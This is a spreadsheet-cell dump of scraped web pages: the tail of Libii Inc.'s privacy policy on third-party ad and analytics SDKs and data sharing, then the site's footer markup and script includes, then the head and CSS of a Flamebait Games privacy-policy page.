 While using the Service we may be using third party software and/or service, in order to (a) collect and/or process Non-personal information; (b) provide you with advertisements on different products and services; and (c) communicate with you through an internal messaging mechanism incorporated in the Service. Such software may include without limitation, Flurry [which privacy policy can be found at: http://www.flurry.com/privacy-policy.html],</t>
  </si>
  <si>
    <t>Google AdMob [which privacy policy can be found at http://www.admob.com/home/privacy] and Umeng [which privacy policy can be found at http://www.umeng.com/privacypolicy].&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
9. Sharing Information with Third Parties&lt;br/&gt;_x005F_x000D_
 We may share Information only in the following cases:&lt;br/&gt;_x005F_x000D_
(a) to satisfy any applicable law, regulation, legal process, subpoena or governmental request; (b) to enforce this Privacy Policy or the Terms of Use, including investigation of potential violations thereof; (c) to detect, prevent, or otherwise address fraud, security or technical issues; (d) to respond to claims that any content published on the Service violates any right of a third-party; (f) to protect the rights, property, or personal safety of the Company, its Users or the general public; (g) when Company is undergoing any change in control, including by means of merger, acquisition or purchase of all or substantially all of the assets of Company; (h) pursuant to your approval, in order to supply certain services you have requested from Company; (i) to let our partners and affiliates serve you with commercials;&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
10.</t>
  </si>
  <si>
    <t>Changes to the Privacy Policy&lt;br/&gt;_x005F_x000D_
 The terms of this Privacy Policy will govern the use of the Service and any information collected therein. Company reserves the right to change this policy at any time, so please re-visit this page frequently.</t>
  </si>
  <si>
    <t>In case of any material change, we will make reasonable efforts to post a clear notice on the Service.&lt;br/&gt;_x005F_x000D_
Changes to this Privacy Policy are effective as of the stated “Last Revised” and your continued use of the Service on or the Last Revised date will constitute acceptance of, and agreement to be bound by, those changes.&lt;br/&gt;_x005F_x000D_
&lt;br/&gt;_x005F_x000D_
11. Got any Questions?&lt;br/&gt;_x005F_x000D_
If you have any questions (or comments) concerning this Privacy Policy, you are most welcomed to send us an email to the following address: [hello@libiitech.com] and we will make an effort to reply within a reasonable timeframe.&lt;br/&gt;	&lt;/div&gt;
&lt;/div&gt;
&lt;footer class="p-t-100 p-b-100 "&gt;
	&lt;div class="container footer-top"&gt;
		&lt;div class="row"&gt;
			&lt;div class="col-12 text-center"&gt;
				&lt;div class="menu-main-menu-container"&gt;&lt;ul id="footer-menu"&gt;&lt;li class="list-inline-item menu-item menu-item-type-custom menu-item-object-custom menu-item-21"&gt;&lt;a href="http://www.libii.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-2357 current_page_item menu-item-2563"&gt;&lt;a href="https://libii.com/?page_id=2357" aria-current="page"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;li class="list-inline-item menu-item menu-item-type-post_type menu-item-object-page menu-item-22"&gt;&lt;a href="https://libii.com/?page_id=8"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;
&lt;li class="list-inline-item menu-item menu-item-type-post_type menu-item-object-page menu-item-229"&gt;&lt;a href="https://libii.com/?page_id=225"&gt;Career&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;			&lt;/div&gt;	
			&lt;div class="col-12"&gt;
&lt;div
	 class="wpml-ls-statics-shortcode_actions wpml-ls wpml-ls-legacy-dropdown js-wpml-ls-legacy-dropdown"&gt;
	&lt;ul&gt;
		&lt;li tabindex="0" class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-en wpml-ls-current-language wpml-ls-last-item wpml-ls-item-legacy-dropdown"&gt;
			&lt;a href="#" class="js-wpml-ls-item-toggle wpml-ls-item-toggle"&gt;&lt;img class="wpml-ls-flag" src="https://libii.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/en.png" alt="en" title="English"&gt;&lt;span class="wpml-ls-native"&gt;English&lt;/span&gt;&lt;/a&gt;
			&lt;ul class="wpml-ls-sub-menu"&gt;
					&lt;li class="wpml-ls-slot-shortcode_actions wpml-ls-item wpml-ls-item-zh-hans wpml-ls-first-item"&gt;
						&lt;a href="https://libii.com/?page_id=2361&amp;amp;lang=zh-hans" class="wpml-ls-link"&gt;&lt;img class="wpml-ls-flag" src="https://libii.com/wp-content/plugins/sitepress-multilingual-cms/res/flags/zh.png" alt="zh-hans" title="简体中文"&gt;&lt;span class="wpml-ls-native"&gt;简体中文&lt;/span&gt;&lt;span class="wpml-ls-display"&gt;&lt;span class="wpml-ls-bracket"&gt; (&lt;/span&gt;Chinese (Simplified)&lt;span class="wpml-ls-bracket"&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;
					&lt;/li&gt;
							&lt;/ul&gt;
		&lt;/li&gt;
	&lt;/ul&gt;
&lt;/div&gt;			&lt;/div&gt;
			&lt;div class="col-sm-12 text-center"&gt;
										&lt;div class="social_networks d-inline"&gt;
							&lt;a href="https://www.facebook.com/Libiigame" class="m-2"&gt;
								&lt;img src="https://libii.com/wp-content/uploads/2019/01/facebook-logo.png" /&gt;
							&lt;/a&gt;
						&lt;/div&gt;
											&lt;div class="social_networks d-inline"&gt;
							&lt;a href="" class="m-2"&gt;
								&lt;img src="https://libii.com/wp-content/uploads/2019/01/twitter-letter-logo.png" /&gt;
							&lt;/a&gt;
						&lt;/div&gt;
											&lt;div class="social_networks d-inline"&gt;
							&lt;a href="" class="m-2"&gt;
								&lt;img src="https://libii.com/wp-content/uploads/2019/01/youtube-logo.png" /&gt;
							&lt;/a&gt;
						&lt;/div&gt;
											&lt;div class="social_networks d-inline"&gt;
							&lt;a href="" class="m-2"&gt;
								&lt;img src="https://libii.com/wp-content/uploads/2019/01/instagram.png" /&gt;
							&lt;/a&gt;
						&lt;/div&gt;
								&lt;/div&gt;
		&lt;/div&gt;
	&lt;/div&gt;
	&lt;div class="container footer-bottom pt-3 text-center"&gt;
		&lt;p&gt;</t>
  </si>
  <si>
    <t>All Right Reserved 2023 © Libii Inc. &lt;/p&gt;
		&lt;span class="site-title"&gt; &lt;a href="https://beian.miit.gov.cn/" rel="external nofollow" target="_blank"&gt; 蜀ICP备15028889号-4 &lt;/a&gt; &lt;/span&gt;
	&lt;/div&gt;
	&lt;!-- Modal --&gt;
	&lt;div class="modal fade" id="libiiCareer" tabindex="-1" role="dialog" aria-labelledby="libiiCareerLabel" aria-hidden="true"&gt;
		&lt;div class="modal-dialog modal-lg modal-dialog-centered" role="document"&gt;
			&lt;div class="modal-content p-5"&gt;
				&lt;div class="modal-body"&gt;
					&lt;h2 class="popup-Title"&gt;  &lt;/h2&gt;
					&lt;hr&gt;
					&lt;div class="mt-5 mb-5 popup-Description"&gt; 
					&lt;/div&gt;
				&lt;/div&gt;
				&lt;div class="modal-footer justify-content-center"&gt;
					&lt;a class="btn btn-red2 w-50 text-uppercase" href="#"&gt;Apply Now!&lt;/a&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
	&lt;/div&gt;
&lt;/footer&gt;
				&lt;style type="text/css"&gt;
					.searchwp-live-search-results {
						opacity: 0;
						transition: opacity .25s ease-in-out;
						-moz-transition: opacity .25s ease-in-out;
						-webkit-transition: opacity .25s ease-in-out;
						height: 0;
						overflow: hidden;
						z-index: 9999;
						position: absolute;
						display: none;
					}
					.searchwp-live-search-results-showing {
						display: block;
						opacity: 1;
						height: auto;
						overflow: auto;
					}
					.searchwp-live-search-no-results {
						padding: 3em 2em 0;
						text-align: center;
					}
					.searchwp-live-search-no-min-chars:after {
						content: "Continue typing";
						display: block;
						text-align: center;
						padding: 2em 2em 0;
					}
				&lt;/style&gt;
			&lt;script type='text/javascript'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/libii.com\/index.php?rest_route=\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/contact-form-7/includes/js/scripts.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js' defer='defer'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js' defer='defer'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.actions.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.carousel.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.kenburn.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.migration.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.navigation.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.parallax.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.video.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;! [CDATA[ */
var searchwp_live_search_params = [];
searchwp_live_search_params = {"ajaxurl":"https:\/\/libii.com\/wp-admin\/admin-ajax.php","config":{"default":{"engine":"default","input":{"delay":500,"min_chars":3},"results":{"position":"bottom","width":"auto","offset":{"x":0,"y":5}},"spinner":{"lines":10,"length":8,"width":4,"radius":8,"corners":1,"rotate":0,"direction":1,"color":"#000","speed":1,"trail":60,"shadow":false,"hwaccel":false,"className":"spinner","zIndex":2000000000,"top":"50%","left":"50%"}}},"msg_no_config_found":"No valid SearchWP Live Search configuration found!","aria_instructions":"When autocomplete results are available use up and down arrows to review and enter to go to the desired page.</t>
  </si>
  <si>
    <t>Touch device users, explore by touch or with swipe gestures. "};;
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/searchwp-live-ajax-search/assets/javascript/build/searchwp-live-search.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;! [CDATA[ */
var newsletter = {"messages":{"email_error":"Email address is not correct","name_error":"Name is required","surname_error":"Last name is required","privacy_error":"You must accept the privacy policy"},"profile_max":"20"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/plugins/newsletter/subscription/validate.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//code.jquery.com/jquery-3.3.1.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/themes/techcode/vendor/style/bootstrap/js/bootstrap.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/themes/techcode/components/magnific-popup/dist/jquery.magnific-popup.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/themes/techcode/components/slick/slick.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/themes/techcode/components/wow/wow.min.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-content/themes/techcode/main.js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='//libii.com/wp-includes/js/wp-embed.min.js'&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-GB"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" /&gt;		&lt;title&gt;Privacy Policy &amp;#8211; Flamebait Games&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Flamebait Games &amp;raquo; Feed" href="https://www.flamebaitgames.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Flamebait Games &amp;raquo; Comments Feed" href="https://www.flamebaitgames.com/comments/feed/" /&gt;
&lt;script&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.flamebaitgames.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};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 o.length;r++)t.supports[o[r]]=function(e){if(p&amp;&amp;p.fillText)switch(p.textBaseline="top",p.font="600 32px</t>
  </si>
  <si>
    <t>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[129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}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&lt;style&gt;
img.wp-smiley,
img.emoji {
	display: inline ! important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !</t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css' href='https://www.flamebaitgames.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' media='all' /&gt;
&lt;style id='wp-block-library-theme-inline-css'&gt;
.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table{margin:"0 0 1em 0"}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
&lt;/style&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://www.flamebaitgames.com/wp-includes/css/classic-themes.min.css?ver=1' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;
body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFF;--wp--preset--color--pale-pink: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#9b51e0;--wp--preset--color--primary: #0073a8;--wp--preset--color--secondary: #005075;--wp--preset--color--dark-gray: #111;--wp--preset--color--light-gray: #767676;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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19.5px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36.5px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--normal: 22px;--wp--preset--font-size--huge: 49.5px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float:</t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;style id='extendify-gutenberg-patterns-and-templates-utilities-inline-css'&gt;
.ext-absolute {
  position: absolute !important;
}
.ext-relative {
  position: relative !important;
}
.ext-top-base {
  top: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-top-lg {
  top: var(--extendify--spacing--large, 3rem) ! important;
}
.ext--top-base {
  top: calc(var(--wp--style--block-gap, 1.75rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext--top-lg {
  top: calc(var(--extendify--spacing--large, 3rem) * -1) !</t>
  </si>
  <si>
    <t>important;
}
.ext-right-base {
  right: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-right-lg {
  right: var(--extendify--spacing--large, 3rem) ! important;
}
.ext--right-base {
  right: calc(var(--wp--style--block-gap, 1.75rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext--right-lg {
  right: calc(var(--extendify--spacing--large, 3rem) * -1) !</t>
  </si>
  <si>
    <t>important;
}
.ext-bottom-base {
  bottom: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-bottom-lg {
  bottom: var(--extendify--spacing--large, 3rem) ! important;
}
.ext--bottom-base {
  bottom: calc(var(--wp--style--block-gap, 1.75rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext--bottom-lg {
  bottom: calc(var(--extendify--spacing--large, 3rem) * -1) ! important;
}
.ext-left-base {
  left: var(--wp--style--block-gap, 1.75rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext-left-lg {
  left: var(--extendify--spacing--large, 3rem) ! important;
}
.ext--left-base {
  left: calc(var(--wp--style--block-gap, 1.75rem) * -1) ! important;
}
.ext--left-lg {
  left: calc(var(--extendify--spacing--large, 3rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext-order-1 {
  order: 1 !important;
}
.ext-order-2 {
  order: 2 !important;
}
.ext-col-auto {
  grid-column: auto !important;
}
.ext-col-span-1 {
  grid-column: span 1 / span 1 !important;
}
.ext-col-span-2 {
  grid-column: span 2 / span 2 !important;
}
.ext-col-span-3 {
  grid-column: span 3 / span 3 !important;
}
.ext-col-span-4 {
  grid-column: span 4 / span 4 !important;
}
.ext-col-span-5 {
  grid-column: span 5 / span 5 !important;
}
.ext-col-span-6 {
  grid-column: span 6 / span 6 !important;
}
.ext-col-span-7 {
  grid-column: span 7 / span 7 !important;
}
.ext-col-span-8 {
  grid-column: span 8 / span 8 !important;
}
.ext-col-span-9 {
  grid-column: span 9 / span 9 !important;
}
.ext-col-span-10 {
  grid-column: span 10 / span 10 !important;
}
.ext-col-span-11 {
  grid-column: span 11 / span 11 !important;
}
.ext-col-span-12 {
  grid-column: span 12 / span 12 !important;
}
.ext-col-span-full {
  grid-column: 1 / -1 !important;
}
.ext-col-start-1 {
  grid-column-start: 1 !important;
}
.ext-col-start-2 {
  grid-column-start: 2 !important;
}
.ext-col-start-3 {
  grid-column-start: 3 !important;
}
.ext-col-start-4 {
  grid-column-start: 4 !important;
}
.ext-col-start-5 {
  grid-column-start: 5 !important;
}
.ext-col-start-6 {
  grid-column-start: 6 !important;
}
.ext-col-start-7 {
  grid-column-start: 7 !important;
}
.ext-col-start-8 {
  grid-column-start: 8 !important;
}
.ext-col-start-9 {
  grid-column-start: 9 !important;
}
.ext-col-start-10 {
  grid-column-start: 10 !important;
}
.ext-col-start-11 {
  grid-column-start: 11 !important;
}
.ext-col-start-12 {
  grid-column-start: 12 !important;
}
.ext-col-start-13 {
  grid-column-start: 13 !important;
}
.ext-col-start-auto {
  grid-column-start: auto !important;
}
.ext-col-end-1 {
  grid-column-end: 1 !important;
}
.ext-col-end-2 {
  grid-column-end: 2 !important;
}
.ext-col-end-3 {
  grid-column-end: 3 !important;
}
.ext-col-end-4 {
  grid-column-end: 4 !important;
}
.ext-col-end-5 {
  grid-column-end: 5 !important;
}
.ext-col-end-6 {
  grid-column-end: 6 !important;
}
.ext-col-end-7 {
  grid-column-end: 7 !important;
}
.ext-col-end-8 {
  grid-column-end: 8 !important;
}
.ext-col-end-9 {
  grid-column-end: 9 !important;
}
.ext-col-end-10 {
  grid-column-end: 10 !important;
}
.ext-col-end-11 {
  grid-column-end: 11 !important;
}
.ext-col-end-12 {
  grid-column-end: 12 !important;
}
.ext-col-end-13 {
  grid-column-end: 13 !important;
}
.ext-col-end-auto {
  grid-column-end: auto !important;
}
.ext-row-auto {
  grid-row: auto !important;
}
.ext-row-span-1 {
  grid-row: span 1 / span 1 !important;
}
.ext-row-span-2 {
  grid-row: span 2 / span 2 !important;
}
.ext-row-span-3 {
  grid-row: span 3 / span 3 !important;
}
.ext-row-span-4 {
  grid-row: span 4 / span 4 !important;
}
.ext-row-span-5 {
  grid-row: span 5 / span 5 !important;
}
.ext-row-span-6 {
  grid-row: span 6 / span 6 !important;
}
.ext-row-span-full {
  grid-row: 1 / -1 !important;
}
.ext-row-start-1 {
  grid-row-start: 1 !important;
}
.ext-row-start-2 {
  grid-row-start: 2 !important;
}
.ext-row-start-3 {
  grid-row-start: 3 !important;
}
.ext-row-start-4 {
  grid-row-start: 4 !important;
}
.ext-row-start-5 {
  grid-row-start: 5 !important;
}
.ext-row-start-6 {
  grid-row-start: 6 !important;
}
.ext-row-start-7 {
  grid-row-start: 7 !important;
}
.ext-row-start-auto {
  grid-row-start: auto !important;
}
.ext-row-end-1 {
  grid-row-end: 1 !important;
}
.ext-row-end-2 {
  grid-row-end: 2 !important;
}
.ext-row-end-3 {
  grid-row-end: 3 !important;
}
.ext-row-end-4 {
  grid-row-end: 4 !important;
}
.ext-row-end-5 {
  grid-row-end: 5 !important;
}
.ext-row-end-6 {
  grid-row-end: 6 !important;
}
.ext-row-end-7 {
  grid-row-end: 7 !important;
}
.ext-row-end-auto {
  grid-row-end: auto !important;
}
.ext-m-0:not([style*="margin"]) {
  margin: 0 !important;
}
.ext-m-auto:not([style*="margin"]) {
  margin: auto !important;
}
.ext-m-base:not([style*="margin"]) {
  margin: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-m-lg:not([style*="margin"]) {
  margin: var(--extendify--spacing--large, 3rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext--m-base:not([style*="margin"]) {
  margin: calc(var(--wp--style--block-gap, 1.75rem) * -1) ! important;
}
.ext--m-lg:not([style*="margin"]) {
  margin: calc(var(--extendify--spacing--large, 3rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext-mx-0:not([style*="margin"]) {
  margin-left: 0 ! important;
  margin-right: 0 !important;
}
.ext-mx-auto:not([style*="margin"]) {
  margin-left: auto !important;
  margin-right: auto !important;
}
.ext-mx-base:not([style*="margin"]) {
  margin-left: var(--wp--style--block-gap, 1.75rem) !</t>
  </si>
  <si>
    <t>important;
  margin-right: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-mx-lg:not([style*="margin"]) {
  margin-left: var(--extendify--spacing--large, 3rem) ! important;
  margin-right: var(--extendify--spacing--large, 3rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext--mx-base:not([style*="margin"]) {
  margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) ! important;
  margin-right: calc(var(--wp--style--block-gap, 1.75rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext--mx-lg:not([style*="margin"]) {
  margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) ! important;
  margin-right: calc(var(--extendify--spacing--large, 3rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext-my-0:not([style*="margin"]) {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
}
.ext-my-auto:not([style*="margin"]) {
  margin-top: auto !important;
  margin-bottom: auto !important;
}
.ext-my-base:not([style*="margin"]) {
  margin-top: var(--wp--style--block-gap, 1.75rem) ! important;
  margin-bottom: var(--wp--style--block-gap, 1.75rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext-my-lg:not([style*="margin"]) {
  margin-top: var(--extendify--spacing--large, 3rem) ! important;
  margin-bottom: var(--extendify--spacing--large, 3rem) ! important;
}
.ext--my-base:not([style*="margin"]) {
  margin-top: calc(var(--wp--style--block-gap, 1.75rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
  margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) !</t>
  </si>
  <si>
    <t>important;
}
.ext--my-lg:not([style*="margin"]) {
  margin-top: calc(var(--extendify--spacing--large, 3rem) * -1) ! important;
  margin-bottom: calc(var(--extendify--spacing--large, 3rem) * -1) !</t>
  </si>
  <si>
    <t>important;
}
.ext-mt-0:not([style*="margin"]) {
  margin-top: 0 ! important;
}
.ext-mt-auto:not([style*="margin"]) {
  margin-top: auto !important;
}
.ext-mt-base:not([style*="margin"]) {
  margin-top: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-mt-lg:not([style*="margin"]) {
  margin-top: var(--extendify--spacing--large, 3rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext--mt-base:not([style*="margin"]) {
  margin-top: calc(var(--wp--style--block-gap, 1.75rem) * -1) ! important;
}
.ext--mt-lg:not([style*="margin"]) {
  margin-top: calc(var(--extendify--spacing--large, 3rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext-mr-0:not([style*="margin"]) {
  margin-right: 0 !important;
}
.ext-mr-auto:not([style*="margin"]) {
  margin-right: auto !important;
}
.ext-mr-base:not([style*="margin"]) {
  margin-right: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-mr-lg:not([style*="margin"]) {
  margin-right: var(--extendify--spacing--large, 3rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext--mr-base:not([style*="margin"]) {
  margin-right: calc(var(--wp--style--block-gap, 1.75rem) * -1) ! important;
}
.ext--mr-lg:not([style*="margin"]) {
  margin-right: calc(var(--extendify--spacing--large, 3rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext-mb-0:not([style*="margin"]) {
  margin-bottom: 0 !important;
}
.ext-mb-auto:not([style*="margin"]) {
  margin-bottom: auto !important;
}
.ext-mb-base:not([style*="margin"]) {
  margin-bottom: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-mb-lg:not([style*="margin"]) {
  margin-bottom: var(--extendify--spacing--large, 3rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext--mb-base:not([style*="margin"]) {
  margin-bottom: calc(var(--wp--style--block-gap, 1.75rem) * -1) ! important;
}
.ext--mb-lg:not([style*="margin"]) {
  margin-bottom: calc(var(--extendify--spacing--large, 3rem) *</t>
  </si>
  <si>
    <t>-1) ! important;
}
.ext-ml-0:not([style*="margin"]) {
  margin-left: 0 !important;
}
.ext-ml-auto:not([style*="margin"]) {
  margin-left: auto !important;
}
.ext-ml-base:not([style*="margin"]) {
  margin-left: var(--wp--style--block-gap, 1.75rem) ! important;
}
.ext-ml-lg:not([style*="margin"]) {
  margin-left: var(--extendify--spacing--large, 3rem) !</t>
  </si>
  <si>
    <t>important;
}
.ext--ml-base:not([style*="margin"]) {
  margin-left: calc(var(--wp--style--block-gap, 1.75rem) * -1) ! important;
}
.ext--ml-lg:not([style*="margin"]) {
  margin-left: calc(var(--extendify--spacing--large, 3rem) * -1) !</t>
  </si>
  <si>
    <t>important;
}
.ext-block {
  display: block !important;
}
.ext-inline-block {
  display: inline-block !important;
}
.ext-inline {
  display: inline !important;
}
.ext-flex {
  display: flex ! important;
}
.ext-inline-flex {
  display: inline-flex !important;
}
.ext-grid {
  display: grid !important;
}
.ext-inline-grid {
  display: inline-grid !important;
}
.ext-hidden {
  display: none !important;
}
.ext-w-auto {
  width: auto !important;
}
.ext-w-full {
  width: 100% !important;
}
.ext-max-w-full {
  max-width: 100% !important;
}
.ext-flex-1 {
  flex: 1 1 0% ! important;
}
.ext-flex-auto {
  flex: 1 1 auto !important;
}
.ext-flex-initial {
  flex: 0 1 auto !important;
}
.ext-flex-none {
  flex: none !important;
}
.ext-flex-shrink-0 {
  flex-shrink: 0 !important;
}
.ext-flex-shrink {
  flex-shrink: 1 !important;
